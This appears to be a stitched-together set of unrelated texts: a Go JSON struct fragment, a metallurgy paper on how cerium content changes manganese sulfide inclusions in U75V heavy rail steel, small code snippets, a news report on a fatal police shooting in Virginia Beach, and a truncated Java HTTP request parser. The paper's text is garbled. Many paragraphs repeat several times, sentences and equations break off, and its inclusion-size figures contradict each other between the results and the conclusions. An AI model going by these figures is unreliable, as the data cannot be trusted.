PhysInvtryAdjustmentPostingSts string `json:"PhysInvtryAdjustmentPostingSts"`
PhysInvtryDeletionStatus string `json:"PhysInvtryDeletionStatus"`
PhysInvtryDocHasQtySnapshot bool `json:"PhysInvtryDocHasQtySnapshot"`
PhysicalInventoryGroupType string `json:"PhysicalInventoryGroupType"`
PhysicalInventoryGroup string `json:"PhysicalInventoryGroup"`
PhysicalInventoryNumber string `json:"PhysicalInventoryNumber"`
PhysInventoryReferenceNumber string `json:"PhysInventoryReferenceNumber"`
PhysicalInventoryDocumentDesc string `json:"PhysicalInventoryDocumentDesc"`
PhysicalInventoryType string `json:"PhysicalInventoryType"`
LastChangeDateTime string `json:"LastChangeDateTime"`
ToItem struct {
Deferred struct {
URI string `json:"uri"`
} `json:"__deferred"`
} `json:"to_PhysicalInventoryDocumentItem"`
} `json:"results"`
} `json:"d"`
}
|
Effect of Rare Earth Cerium Content on Manganese Sulfide in U75V Heavy Rail Steel
: To study the effect of Ce on the morphology of manganese sulfide, we added different contents of Ce into U75V heavy rail steel. The composition and morphology of sulfide in steel were analyzed. The inclusions’ number, size, and aspect ratio were analyzed by automatic scanning electron microscope ASPEX. The results show that the inclusions in heavy rail steel without Ce are elongated MnS and irregular Al-Si-Ca-O inclusions. With the increase of Ce from 52 ppm to 340 ppm, the composition of main inclusions changes along the route of Ce 2 O 2 S-MnS → Ce 2 O 2 S-MnS-Ce 2 S 3 → Ce 2 O 2 S-Ce 3 S 4 -Ce 2 S 3 → Ce 2 O 2 S-Ce 3 S 4 -CeS. Ce has a noticeable spheroidization effect on MnS, which can make inclusions finely dispersed. When Ce content is 139 ppm, the average size of inclusions is the smallest. The mechanism of Ce-modified MnS was discussed by combining experimental results with thermodynamic calculations. Finally, the effect of Ce treatment on inhibiting MnS deformation was verified by simulated rolling.
Introduction
U75V high-speed heavy rail steel is fine pearlite steel with high strength, toughness, and wear resistance. It exhibits high sensitivity to white spot, however, it is difficult to completely remove hydrogen from this type of steel. According to previous studies , an increase in the S content of steel or the presence of MnS can reduce the diffusion coefficient of hydrogen in steel, thereby mitigating the damage caused by hydrogen. However, due to the excellent deformation ability of MnS, the elongation of MnS along the rolling direction during the rolling process has become one of the essential factors causing excessive inclusions and inconsistencies in ultrasonic flaw detection. The large-size and long-striped structure of MnS induce anisotropy in steel and significantly reduce the transverse properties of the material. MnS inclusions initiate crack formation, which occurs at the interface between sulfide and the matrix under stress. With an increase in the load, the crack expands gradually along with the striped MnS inclusions . Therefore, to improve the mechanical properties of heavy rail steel, it is particularly vital to control the morphology, size, number density, and distribution of MnS .
At present, there are generally two methods to control the morphology of MnS during the steelmaking process. The first method involves the formation of a mass of oxide inclusions in the molten steel by adding titanium, magnesium, zirconium, and other elements to promote the heterogeneous nucleation of MnS precipitates. This method allows the formations of small and dispersed MnS inclusions. Oikawa et al. found that the size of MnS inclusions decreased significantly after adding Ti to Fe-0.1C-1Mn-0.02S steel. They proposed that the liquid nucleus of (Ti, Mn) O formed at the solid-liquid interface of steel serves as the heterogeneous nucleation site of MnS droplets. Xie et al. reported that when the Mg content of 16MnCrS5 steel was 35-42 ppm, numerous fine spindle-shaped or spherical composite inclusions with MgO-Al 2 O 3 as the core and MnS as the shell were
Materials and Methods
The experiment was completed in a tubular Si-Mo resistance furnace. A 300 g U75V steel sample, taken from the casting billet and cut into small pieces, was put into a MgO crucible with an inner diameter of 40 mm and an outer diameter of 48 mm. A graphite crucible was coated on the MgO crucible to protect the furnace. The schematic diagram of the resistance furnace and the composition of molten steel are shown in Figure 1 and Table 1. without stirring. Five levels of Ce content, 52 ppm, 139 ppm, 171 ppm, 256 ppm, and 340 ppm, were used to study the effect of Ce content on inclusions in heavy rail steel. After holding for 15 min, the temperature began to decrease. When the temperature dropped to 700 °C, the power was cut off, and then the resistance furnace was cooled to room temperature by furnace cooling. In total, 2.5 L/min argon was injected throughout the experiment. The ingot was cut into a cylindrical sample of ⌀8 × 15 mm, which was used for the rolling simulated experiment. The temperature system refers to the production process of a plant, as shown in Figure 2b. The deformed samples were cut, polished, and observed with ASPEX. The simulation rolling experiment was completed on gleeble-3500 thermal simulation testing machine (Dynamic Systems Inc., Poestenkill, NY, USA). The Ce content was measured by the ICP method. The composition, quantity, size, and aspect ratio of inclusions were analyzed by an ASPEX automatic scanning electron The schematic diagram of the experimental process is shown in Figure 2a. After the crucible was placed, the upper lower ends of the furnace were closed; the temperature of the resistance furnace was set as shown in Figure 2a. When the temperature reached 1600 • C, it was held for 30 min to ensure that the steel blocks were melted and completely homogenized. Then, Ce was wrapped with pure iron foil and added to the molten steel without stirring. Five levels of Ce content, 52 ppm, 139 ppm, 171 ppm, 256 ppm, and 340 ppm, were used to study the effect of Ce content on inclusions in heavy rail steel. After holding for 15 min, the temperature began to decrease. When the temperature dropped to 700 • C, the power was cut off, and then the resistance furnace was cooled to room temperature by furnace cooling. In total, 2.5 L/min argon was injected throughout the experiment. homogenized. Then, Ce was wrapped with pure iron foil and added to the molten steel without stirring. Five levels of Ce content, 52 ppm, 139 ppm, 171 ppm, 256 ppm, and 340 ppm, were used to study the effect of Ce content on inclusions in heavy rail steel. After holding for 15 min, the temperature began to decrease. When the temperature dropped to 700 °C, the power was cut off, and then the resistance furnace was cooled to room temperature by furnace cooling. In total, 2.5 L/min argon was injected throughout the experiment. The ingot was cut into a cylindrical sample of ⌀8 × 15 mm, which was used for the rolling simulated experiment. The temperature system refers to the production process of a plant, as shown in Figure 2b. The deformed samples were cut, polished, and observed with ASPEX. The simulation rolling experiment was completed on gleeble-3500 thermal simulation testing machine (Dynamic Systems Inc., Poestenkill, NY, USA). The Ce content was measured by the ICP method. The composition, quantity, size, and aspect ratio of inclusions were analyzed by an ASPEX automatic scanning electron The ingot was cut into a cylindrical sample of ∅8 × 15 mm, which was used for the rolling simulated experiment. The temperature system refers to the production process of a plant, as shown in Figure 2b. The deformed samples were cut, polished, and observed with ASPEX. The simulation rolling experiment was completed on gleeble-3500 thermal simulation testing machine (Dynamic Systems Inc., Poestenkill, NY, USA).
The Ce content was measured by the ICP method. The composition, quantity, size, and aspect ratio of inclusions were analyzed by an ASPEX automatic scanning electron microscope (FEI, Hillsboro, OR, USA) after the ingot was ground and polished. The sampling position, analysis surface, and random observation position are shown in Figure 3, which reduces the influence of S element segregation inside the ingot. The scanning area of each sample was about 10 mm 2 , and the minimum size of inclusions scanned was 1 µm. The inclusion morphology was observed by a ZEISS electron microscope equipped with an EDS (Energy Dispersive Spectrometer) model of Gemini SEM 500 (Zeiss, Niedersachsen, Germany). The extraction of inclusions was conducted by electrolysis with anhydrous organic solution, and the electrolyte was 10% AA solution (a mixed solution of 1% tetramethylammonium chloride-10% acetylacetone-89% methanol). Figure 4 is the schematic diagram of the electrolytic cell. The current density was 0.04 A/cm 2 and the temperature was 0~5 • C. The electrolysis time was 4 h. After electrolysis, the filtered membrane was filtered with Polytetrafluoroethylene (PTFE) filter membrane. After spraying gold on the filtered membrane, the three-dimensional characteristics of inclusions were observed by field emission scanning electron microscopy. Table 2 shows the Ce content in each sample, where C0 is the control group without Ce addition.
Metals 2022, 12, x FOR PEER REVIEW 4 of 13 microscope (FEI, Hillsboro, OR, USA) after the ingot was ground and polished. The sampling position, analysis surface, and random observation position are shown in Figure 3, which reduces the influence of S element segregation inside the ingot. The scanning area of each sample was about 10 mm 2 , and the minimum size of inclusions scanned was 1 μm. The inclusion morphology was observed by a ZEISS electron microscope equipped with an EDS (Energy Dispersive Spectrometer) model of Gemini SEM 500 (Zeiss, Niedersachsen, Germany). The extraction of inclusions was conducted by electrolysis with anhydrous organic solution, and the electrolyte was 10% AA solution (a mixed solution of 1% tetramethylammonium chloride-10% acetylacetone-89% methanol). Figure 4 is the schematic diagram of the electrolytic cell. The current density was 0.04 A/cm 2 and the temperature was 0~5 °C. The electrolysis time was 4 h. After electrolysis, the filtered membrane was filtered with Polytetrafluoroethylene (PTFE) filter membrane. After spraying gold on the filtered membrane, the three-dimensional characteristics of inclusions were observed by field emission scanning electron microscopy. Table 2 shows the Ce content in each sample, where C0 is the control group without Ce addition. Figure 5 shows the morphology and elemental mapping profiles of typical inclusions with different Ce contents. Figure 5a,b shows the control group C0 without Ce treatment. The inclusions are mainly large-scale irregular striped MnS and spherical Al2O3-SiO2-CaO inclusions. After Ce treatment, the inclusions in steel convert to oxygen sulfides or Ce sulfides, which is in agreement with the result reported by Adabavazeh et , which reduces the influence of S element segregation inside the ingot. The scanning area of each sample was about 10 mm 2 , and the minimum size of inclusions scanned was 1 μm. The inclusion morphology was observed by a ZEISS electron microscope equipped with an EDS (Energy Dispersive Spectrometer) model of Gemini SEM 500 (Zeiss, Niedersachsen, Germany). The extraction of inclusions was conducted by electrolysis with anhydrous organic solution, and the electrolyte was 10% AA solution (a mixed solution of 1% tetramethylammonium chloride-10% acetylacetone-89% methanol). Figure 4 is the schematic diagram of the electrolytic cell. The current density was 0.04 A/cm 2 and the temperature was 0~5 °C. The electrolysis time was 4 h. After electrolysis, the filtered membrane was filtered with Polytetrafluoroethylene (PTFE) filter membrane. After spraying gold on the filtered membrane, the three-dimensional characteristics of inclusions were observed by field emission scanning electron microscopy. Table 2 shows the Ce content in each sample, where C0 is the control group without Ce addition. Figure 5 shows the morphology and elemental mapping profiles of typical inclusions with different Ce contents. Figure 5a,b shows the control group C0 without Ce treatment. The inclusions are mainly large-scale irregular striped MnS and spherical Al2O3-SiO2-CaO inclusions. After Ce treatment, the inclusions in steel convert to oxygen sulfides or Ce sulfides, which is in agreement with the result reported by Adabavazeh et Figure 5 shows the morphology and elemental mapping profiles of typical inclusions with different Ce contents. Figure 5a,b shows the control group C0 without Ce treatment. The inclusions are mainly large-scale irregular striped MnS and spherical Al 2 O 3 -SiO 2 -CaO inclusions. After Ce treatment, the inclusions in steel convert to oxygen sulfides or Ce sulfides, which is in agreement with the result reported by Adabavazeh et al. and Gao et al. . Because of the low wettability and large contact angle between Ce-containing inclusions and molten steel , the inclusions in molten steel are ellipsoidal, and their size is markedly reduced. When the Ce content was 52 ppm, the primary inclusion type was Ce 2 O 2 S that formed the core, with a small amount of MnS composite inclusions precipitated on the surface, as shown in Figure 5c. In addition to the Ce 2 O 2 S-MnS composite inclusions, Ce x S inclusions were observed when Ce content was 139 ppm and 171 ppm, as shown in Figure 5d. However, when the Ce content was approximately 256 and 340 ppm, the typical inclusions were single Ce 2 O 2 S inclusions and composite Ce 2 O 2 S and Ce x S inclusions, as shown in Figure 5e al. and Gao et al. . Because of the low wettability and large contact angle between Ce-containing inclusions and molten steel , the inclusions in molten steel are ellipsoidal, and their size is markedly reduced. When the Ce content was 52 ppm, the primary inclusion type was Ce2O2S that formed the core, with a small amount of MnS composite inclusions precipitated on the surface, as shown in Figure 5c. The three-dimensional morphology of typical inclusions with different Ce contents is shown in Figure 6. Figure 6a shows the morphology of MnS in the steel without Ce addition; it can be seen that MnS is irregular and large. When the Ce was 52 ppm, the typical inclusion was an ellipsoidal composite, with Ce2O2S as the core, and a small amount of MnS precipitates on the surface. No single irregular MnS precipitates were observed, as shown in Figure 6b. The three-dimensional morphology of typical inclusions with different Ce contents is shown in Figure 6. Figure 6a shows the morphology of MnS in the steel without Ce addition; it can be seen that MnS is irregular and large. When the Ce was 52 ppm, the typical inclusion was an ellipsoidal composite, with Ce 2 O 2 S as the core, and a small amount of MnS precipitates on the surface. No single irregular MnS precipitates were observed, as shown in Figure 6b. Figure 6c, the inclusion comprised Ce 2 O 2 S as the core, with the surface precipitation of MnS and Ce x S composite inclusions. Theses type of inclusions are not observed in the two-dimensional morphology, indicating that three-dimensional morphology can more accurately reveal the type of inclusions. It can be found that the variation trend of inclusions is similar to that illustrated in Figure 5. Ce2O2S-CexS, as shown in Figure 6e,f. It is worth mentioning that in Figure 6c, the inclusion comprised Ce2O2S as the core, with the surface precipitation of MnS and CexS composite inclusions. Theses type of inclusions are not observed in the two-dimensional morphology, indicating that three-dimensional morphology can more accurately reveal the type of inclusions. It can be found that the variation trend of inclusions is similar to that illustrated in Figure 5. The typical inclusion types of each sample obtained after electron microscopy were classified and counted; the results are summarized in Table 3. When the Ce content was 52 ppm, the striped MnS disappeared. Nonetheless, the Ce content must be optimized on the basis of the size, number density, and aspect ratio of inclusions.
Number Density, Size, and Aspect Ratio of Inclusions
To quantitatively characterize the inclusions in the steel sample, the number density, average size, and aspect ratio of the inclusions were calculated, the results are shown in Figures 7 and 8. Figure 7 shows the changes in the number density and size of inclusions in different samples. Ce addition was found to significantly increase the number density of the inclusions in molten steel. When Ce was not added, the number density of the inclusions was 17.74/mm 2 . With an increase in the Ce content, the number density of the inclusions increased, reaching a maximum of 51.76/mm 2 at 340 ppm Ce. In addition, Ce addition can significantly reduce the size of the inclusions. The average size of the inclusions before Ce addition was 6.74 μm, whereas after Ce addition it was 3.22-4.16 μm. Unlike the number density, the average size of the inclusions first decreased and then increased with an increase in the Ce content, which agrees with the result of Luo and Wang . Because of the change of free energy, the free energy of O and S binding in Ce and steel is con- The typical inclusion types of each sample obtained after electron microscopy were classified and counted; the results are summarized in Table 3. When the Ce content was 52 ppm, the striped MnS disappeared. Nonetheless, the Ce content must be optimized on the basis of the size, number density, and aspect ratio of inclusions.
Typical Inclusions Si-Al-Ca-O MnS Ce 2 O 2 S-MnS Ce x S Ce 2 O 2 S Ce 2 O 2 S-Ce x S Ce 2 O 2 S-Ce x S-MnS
: the main type of inclusions, √ : a small number of inclusions.
Number Density, Size, and Aspect Ratio of Inclusions
To quantitatively characterize the inclusions in the steel sample, the number density, average size, and aspect ratio of the inclusions were calculated, the results are shown in Figures 7 and 8. siderably lower than that of S and Mn binding; thus, rare earth oxygen sulfides are easily generated . Moreover, the melting point of rare earth sulfides is higher than that of MnS, and they precipitate before MnS during the solidification process. The continuous consumption of S reduces the activity of S in steel, which significantly affects the combination of Mn and S, thereby decreasing the core of heterogeneous nucleation, and reducing the probability of the transformation of single-particle MnS inclusions to large MnS inclusions under high supersaturation conditions. When the Ce content was high or excessive, the addition of excessive Ce enhances the binding ability of rare earth elements to the formation elements of the inclusions, resulting in the formation of a large number of rare earth inclusions. The inclusion collision and aggregation probabilities increase sharply; therefore, the inclusion size increases gradually. The effect of the Ce content on the aspect ratio of the inclusions is shown in Figure 8. The average aspect ratio of the inclusions decreased significantly after Ce addition. The aspect ratio of the inclusions without Ce was 1.9, whereas for the inclusions with Ce it
Thermodynamic Analysis of Inclusion Formation in Steel
The precipitation of each sample during the cooling process was calculated by FactSage8.1, a thermodynamic calculation software; the result is shown in Figure 9. The inclusions without Ce were primarily the Al2O3-SiO2-MgO and MnS. When the Ce content was 52 ppm, a large amount of dispersed Ce2O2S was formed at 1600 °C. Ce2O2S acts as a heterogeneous nucleation core during the cooling process of molten steel, which facilitates MnS precipitation on its surface and avoids the formation of long-striped MnS. As can be seen in Figure 9c, when the Ce content was 139 ppm, CeS began to form at high temperatures. During the cooling process, CeS was first converted to Ce3S4 and finally to Ce2S3 near the liquidus temperature. With a further increase in the Ce content by 171 ppm, the Ce2O2S content slightly changed, the Ce2S3 content increased gradually, and the amount of MnS precipitates decreased gradually, as shown in Figure 9d. As shown in Figure 9e,f, when the Ce content was 256 and 340 ppm, MnS precipitation did not occur at all, and the stable sulfide phase of solidified Ce was changed from single Ce2S3 to Ce2S3, Ce3S4, and CeS and Ce3S4, respectively, which is consistent with the analysis results of the abovementioned inclusion morphology. Through the above analysis, we confirm that Ce plays a role in mitigating the formation of long-striped MnS through two ways: (1) Ce induces the precipitation of MnS on the surface of sulfur oxides, and (2) the total amount of MnS precipitates is reduced upon S consumption. Figure 7 shows the changes in the number density and size of inclusions in different samples. Ce addition was found to significantly increase the number density of the inclusions in molten steel. When Ce was not added, the number density of the inclusions was 17.74/mm 2 . With an increase in the Ce content, the number density of the inclusions increased, reaching a maximum of 51.76/mm 2 at 340 ppm Ce. In addition, Ce addition can significantly reduce the size of the inclusions. The average size of the inclusions before Ce addition was 6.74 µm, whereas after Ce addition it was 3.22-4.16 µm. Unlike the number density, the average size of the inclusions first decreased and then increased with an increase in the Ce content, which agrees with the result of Luo and Wang . Because of the change of free energy, the free energy of O and S binding in Ce and steel is considerably lower than that of S and Mn binding; thus, rare earth oxygen sulfides are easily generated . Moreover, the melting point of rare earth sulfides is higher than that of MnS, and they precipitate before MnS during the solidification process. The continuous consumption of S reduces the activity of S in steel, which significantly affects the combination of Mn and S, thereby decreasing the core of heterogeneous nucleation, and reducing the probability of the transformation of single-particle MnS inclusions to large MnS inclusions under high supersaturation conditions. When the Ce content was high or excessive, the addition of excessive Ce enhances the binding ability of rare earth elements to the formation elements of the inclusions, resulting in the formation of a large number of rare earth inclusions. The inclusion collision and aggregation probabilities increase sharply; therefore, the inclusion size increases gradually.
The effect of the Ce content on the aspect ratio of the inclusions is shown in Figure 8. The average aspect ratio of the inclusions decreased significantly after Ce addition. The aspect ratio of the inclusions without Ce was 1.9, whereas for the inclusions with Ce it was between 1.55 and 1.86. The average aspect ratio of the inclusions increases with the Ce content. The proportion of the inclusions with an aspect ratio between one and two increased significantly after Ce treatment. The proportion of inclusions with an aspect ratio between two and three and >three decreased, indicating that Ce addition induces an apparent spheroidization effect on the inclusions. However, when the Ce content is excessive, i.e., more than 256 ppm, the proportion of the inclusions with an aspect ratio between one and two decreased gradually, whereas the proportion of the inclusions with an aspect ratio between two and three increases gradually. This trend is observed because inclusion collision and aggregation lead to an irregular shape and size enlargement. It indicates that excessive Ce content is not conducive to the dispersion and fine control of the inclusions. According to the number density, size, and aspect ratio of the inclusions, many fine and dispersed ellipsoidal inclusions can be generated at 139 ppm Ce.
Thermodynamic Analysis of Inclusion Formation in Steel
The precipitation of each sample during the cooling process was calculated by Fact-Sage8.1, a thermodynamic calculation software; the result is shown in Figure 9. The inclusions without Ce were primarily the Al 2 O 3 -SiO 2 -MgO and MnS. When the Ce content was 52 ppm, a large amount of dispersed Ce 2 O 2 S was formed at 1600 • C. Ce 2 O 2 S acts as a heterogeneous nucleation core during the cooling process of molten steel, which facilitates MnS precipitation on its surface and avoids the formation of long-striped MnS. As can be seen in Figure 9c, when the Ce content was 139 ppm, CeS began to form at high temperatures. During the cooling process, CeS was first converted to Ce 3 S 4 and finally to Ce 2 S 3 near the liquidus temperature. With a further increase in the Ce content by 171 ppm, the Ce 2 O 2 S content slightly changed, the Ce 2 S 3 content increased gradually, and the amount of MnS precipitates decreased gradually, as shown in Figure 9d. As shown in Figure 9e,f, when the Ce content was 256 and 340 ppm, MnS precipitation did not occur at all, and the stable sulfide phase of solidified Ce was changed from single Ce 2 S 3 to Ce 2 S 3 , Ce 3 S 4 , and CeS and Ce 3 S 4 , respectively, which is consistent with the analysis results of the abovementioned inclusion morphology. Through the above analysis, we confirm that Ce plays a role in mitigating the formation of long-striped MnS through two ways: (1) Ce induces the precipitation of MnS on the surface of sulfur oxides, and (2) the total amount of MnS precipitates is reduced upon S consumption.
Evolution Mechanism of Inclusions in Heavy Rail Steel after Adding Ce
Based on the thermodynamic calculation and the experimental results, the evolution mechanism of the inclusions in U75V heavy rail steel after Ce addition was investigated, as illustrated in Figure 10. According to the composition and morphology analysis of the inclusions, mass Ce2O2S phases exist in the inclusions upon Ce addition, which mainly have two sources. (1) The entry of Ce into molten steel and its combination with O and S
Evolution Mechanism of Inclusions in Heavy Rail Steel after Adding Ce
Based on the thermodynamic calculation and the experimental results, the evolution mechanism of the inclusions in U75V heavy rail steel after Ce addition was investigated, as illustrated in Figure 10. According to the composition and morphology analysis of the inclusions, mass Ce 2 O 2 S phases exist in the inclusions upon Ce addition, which mainly have two sources. (1) The entry of Ce into molten steel and its combination with O and S in the molten steel, which can be expressed as Equation (1) , and (2) the modification of the SiO 2 -Al 2 O 3 -CaO inclusion upon Ce addition. When Ce is not added to molten steel, the inclusions at high temperature mainly comprise the SiO 2 -Al 2 O 3 -CaO system. These inclusions are generally large and irregular in shape, while MnS is precipitated during solidification . Therefore, Ce added to the molten steel first diffuses to the interface between the oxide inclusions and molten steel in the form of atoms, followed by their conversion to the ionic form and attachment to the surface of the oxide inclusions. Second, Ce ions react with the active sites on the oxide surface, and reaction products CeAlO 3 and Ce 2 O 3 adhere to the surface of the original inclusion in the form of a liquid film and grow. As the reaction proceeds, Ce and O in the molten steel continue to diffuse into the interface; the reaction proceeds smoothly, with an increase in the thickness of the liquid film. Once the liquid film reaches a specific thickness, it solidifies and aggregates into spheres according to the principle of minimum surface energy . Thus, a composite inclusion with Si-Al-Ca-O as the core and Ce-Si-Al-Ca oxide as the surface is formed. Al and Si in the inner layer also diffuses to the outer layer with further reaction. Ce ions continue to diffuse to the inner layer, and the required diffusion driving force increases accordingly. At this stage, the ion exchange process of Ce and Al, Si and Ca slows down. Till the end of the diffusion process of internal and external ions, Ce completes the modification of Al-Si-Ca oxide in steel, which can be expressed as Equation (2) . At this stage, the content of Ce in molten steel is sufficient to allow the reaction between Ce oxide S in molten steel, generating oxygen sulfide, which can be expressed as Equation (3) . Till the end of the diffusion process of internal and external ions, Ce completes the modification of Al-Si-Ca oxide in steel, which can be expressed as Equation (2) . At this stage, the content of Ce in molten steel is sufficient to allow the reaction between Ce oxide S in molten steel, generating oxygen sulfide, which can be expressed as Equation (3) . The subsequent inclusion evolution can be roughly divided into three paths according to the different Ce contents. When the content of Ce in molten steel is low (52 ppm), the Ce2O2S inclusions are formed at steelmaking temperature. As the temperature decreases to the liquidus, MnS precipitates on the surface of the Ce2O2S inclusions until the temperature drops to room temperature and the inclusions are composed of the Ce2O2S-MnS composite. When the Ce content of molten steel increases to the moderate levels of 139 and 171 ppm, Ce reacts with S in molten steel to form CeS at the steelmaking temperature. Then, with the decrease in temperature, CeS will undergo phase transfor- The subsequent inclusion evolution can be roughly divided into three paths according to the different Ce contents. When the content of Ce in molten steel is low (52 ppm), the Ce 2 O 2 S inclusions are formed at steelmaking temperature. As the temperature decreases to the liquidus, MnS precipitates on the surface of the Ce 2 O 2 S inclusions until the temperature drops to room temperature and the inclusions are composed of the Ce 2 O 2 S-MnS composite. When the Ce content of molten steel increases to the moderate levels of 139 and 171 ppm, Ce reacts with S in molten steel to form CeS at the steelmaking temperature. Then, with the decrease in temperature, CeS will undergo phase transformation, from CeS to Ce 3 S 4 and then to Ce 2 S 3 . Some of these compounds embed on the surface of Ce 2 O 2 S. When the temperature further decreases to the liquidus temperature, MnS begins to precipitate on Ce 2 O 2 S. Finally, upon cooling to room temperature, the inclusion comprises Ce 2 O 2 S-MnS-Ce 2 S 3 . Ce 2 O 2 S and CeS are also formed at high temperatures when the content of Ce in molten steel reaches 256 and 340 ppm, but no MnS was precipitated during the cooling process. The difference was that CeS completely transformed into Ce 2 S 3 and Ce 3 S 4 when Ce was 256 ppm, while CeS partially transforms into Ce 3 S 4 when Ce was 340 ppm. The formation of sulfides in Ce can be described by Equations (4)-(6) . + = (CeS), G θ = −422100 + 120.38T (4) 3.5. Effect of Ce on Sulfide after Simulated Rolling Figure 11 shows the distribution of the aspect ratio of inclusions after hot compression. The average aspect ratio of the inclusions in C0 was 2.77, while the aspect ratio of the inclusions after hot compression upon Ce addition was 1.54-1.83, which was significantly smaller than that of the former, indicating that the inclusions of Ce-added steel are still nearspherical after hot compression. Regarding the proportion of the inclusions with different aspect ratios, the proportions of the inclusions with varying aspect ratios in sample C0 were~30%. Compared with those before rolling, as shown in Figure 8, the proportion of the inclusions with aspect ratios between one and two was significantly reduced, and the proportions of the inclusions with aspect ratios between two and three and larger than three were significantly increased, which indicates that MnS underwent deformation during hot compression. According to the change in the aspect ratios before and after simulated rolling, the change in the aspect ratio of the inclusion in C0 was 45.79%. In contrast, the aspect ratios of C1 to C5 upon Ce addition changed negligibly, indicating that MnS is not elongated. This confirms that Ce can well inhibit the deformation of MnS during rolling. Based on the calculation results for the number density and size of inclusions, the inclusions in C2 have a high number density and a small size. Therefore, to obtain numerous small and dispersed deformation-resistant inclusions in U75V heavy rail steel, the Ce content must be controlled at 139 ppm. and after simulated rolling, the change in the aspect ratio of the inclusion in C0 was 45.79%. In contrast, the aspect ratios of C1 to C5 upon Ce addition changed negligibly, indicating that MnS is not elongated. This confirms that Ce can well inhibit the deformation of MnS during rolling. Based on the calculation results for the number density and size of inclusions, the inclusions in C2 have a high number density and a small size. Therefore, to obtain numerous small and dispersed deformation-resistant inclusions in U75V heavy rail steel, the Ce content must be controlled at 139 ppm.
Conclusions
This study analyzed the composition, two-dimensional and three-dimensional morphologies, number density, and size of the inclusions in heavy rail steel with different Ce contents. The evolution of the inclusions after Ce addition was discussed, and the effect of added Ce on modified MnS was investigated in terms of the aspect ratio of the inclusions before and after thermal deformation. The conclusions are as follows:
Conclusions
This study analyzed the composition, two-dimensional and three-dimensional morphologies, number density, and size of the inclusions in heavy rail steel with different Ce contents. The evolution of the inclusions after Ce addition was discussed, and the effect of added Ce on modified MnS was investigated in terms of the aspect ratio of the inclusions before and after thermal deformation. The conclusions are as follows: (1) Without Ce addition to steel, the inclusions in heavy rail steel were elongated MnS and irregular Al-Si-Ca-O inclusions. With the increase in the Ce content from 52 to 340 ppm, the composition of the main inclusions changed in order of Ce 2 O 2 S-MnS → Ce 2 O 2 S-MnS-Ce 2 S 3 → Ce 2 O 2 S-Ce 3 S 4 -Ce 2 S 3 → Ce 2 O 2 S-Ce 3 S 4 -CeS. (2) The addition of Ce to molten steel causes a significant increase in the number density and a considerable reduction in the size and aspect ratio of the inclusions. The average size of the inclusions without Ce was 6.74 µm. The average size of inclusions upon Ce addition was 2.01-4.04 µm, the size of inclusions was the smallest at 139 ppm Ce. (3) The change in the aspect ratio of the inclusions before and after thermal deformation was minimal, indicating that Ce can significantly inhibit the deformation of inclusions during the hot compression process. Therefore, when the Ce content of molten steel was 139 ppm, substantial amounts of dispersed, fine, and deformation-resistant inclusions can be obtained. |
<reponame>dreycat/SomaOS
export const deepClone = (x: any) => JSON.parse(JSON.stringify(x));
|
package com.corpus.service;
import net.sf.json.JSONArray;
public interface TrainingService {
//生成训练集和测试集
public String getSet(JSONArray jsonArray);
//只生成不导出
//生成+导出
}
|
<filename>documents/cFiles/operatingSystems/sourceCode/chapter13/printinitoncetest.c
#include <stdio.h>
int printinitonce(void);
extern int var;
int main(void) {
printinitonce();
printf("var is %d\n",var);
printinitonce();
printf("var is %d\n",var);
printinitonce();
printf("var is %d\n",var);
return 0;
}
|
/**
* Created by Artem Godin on 3/25/2020.
*/
public final class DisconnectProductionLoggerFactorySubstitution {
private static final Logger productionLogger = new DisconnectProductionLogger();
private static final ILoggerFactory productionLoggerFactory =
new DisconnectProductionLoggerFactory();
private DisconnectProductionLoggerFactorySubstitution() {
}
public static Logger getLogger(String name) {
return productionLogger;
}
public static Logger getLogger(Class<?> clazz) {
return productionLogger;
}
public static ILoggerFactory getILoggerFactory() {
return productionLoggerFactory;
}
} |
def upload_artifact_content(self, origin, container, attachment_name, content=None,
index=None, append=None, is_async=False):
return self._execute_with_workspace_arguments(self._client.artifact.upload,
origin=origin,
container=container,
path=attachment_name,
content=content,
index=index,
append=append,
is_async=is_async) |
Copyright by WAVY - All rights reserved The scene off Lynnhaven Parkway
Copyright by WAVY - All rights reserved The scene off Lynnhaven Parkway
WAVY Staff -
VIRGINIA BEACH, Va. (WAVY) -- Two people were killed during an officer-involved shooting in Virginia Beach. Police said a suspect shot at officers, who returned fire.
It happened outside the 7-Eleven at the corner of Lynnhaven Parkway and Salem Road. A little before midnight Saturday, Virginia Beach police got information about a person of interest in a homicide case.
Officers found the subject in a car outside the 7-Eleven at 2093 Lynnhaven Parkway. When officers got close, police say the subject shot at them. A bullet went through one officer's shirt. He was not harmed.
"Over the fence over there we heard pop-pop," a person who lived nearby said. "Then a moment of silence then I heard a loud burst of gunfire. It sounded like an automatic weapon."
Those officers shot back at the car and hit the subject. During the shooting bullets also struck the female driver of the car. Both the driver and suspect died at the scene. They were identified Monday as 35-year-old Angelo Delano Perry of Virginia Beach and 28-year-old India Kager of College Park, Maryland.
"There was a whole bunch of cop cars racing to the scene and there was a van over there with bullet holes in it and a black car," Daquon Brown, who saw the investigation said. "It looked like it was crashed; looked like the van crashed into it."
"The officers that were involved in this will be placed on administrative duty," Virginia Beach Public Information Officer Tonya Borman said. "Any case that is officer-involved is also looked at internally. It's a three-prong investigation involving our internal affairs, our homicide unit and the Commonwealth's Attorney's Office."
Ofc. Borman said an infant was in the car at the time of the shooting. That child was not harmed and was turned over to Child Protective Services.
Virginia Beach Police are also conducting an active investigation of other suspects related to the original homicide investigation. |
package http;
import java.io.UnsupportedEncodingException;
import java.util.ArrayList;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.apache.commons.lang3.StringUtils;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class HttpRequest extends HttpBase{
private static final long serialVersionUID = 2950552847217478218L;
private final static Logger logger = LogManager.getLogger(HttpRequest.class);
private HttpRequestLine httprequestline;
public HttpRequest(byte [] requestMessage){
super(requestMessage);
String httpMessage = new String(super.rawMessage);
String requestLine = StringUtils.substringBefore(httpMessage,"\r\n");
this.httprequestline = new HttpRequestLine(requestLine);
}
public HttpRequestLine getRequestLine(){
return this.httprequestline;
}
public String getRequestLineString(){
return httprequestline.getRequestLineStringNoCRLF();
}
public String getBodyParameter(){
String method = httprequestline.getMethod();
String returnString = null;
if("POST".equals(method)){
returnString = StringUtils.substringAfterLast(new String(super.rawMessage), "\r\n\r\n");
}else{
returnString = null;
}
return returnString;
}
public void setRequestLine(String requestLine){
this.httprequestline = new HttpRequestLine(requestLine);
}
public void updateContentLength(){
String requestMessage = new String(super.rawMessage);
String requestBody = StringUtils.substringAfter(requestMessage, "\r\n\r\n");
if(requestBody.length() < 1){
return;
}
String charsetString = this.getCharset();
int countentLength = -1;
if(charsetString != null){
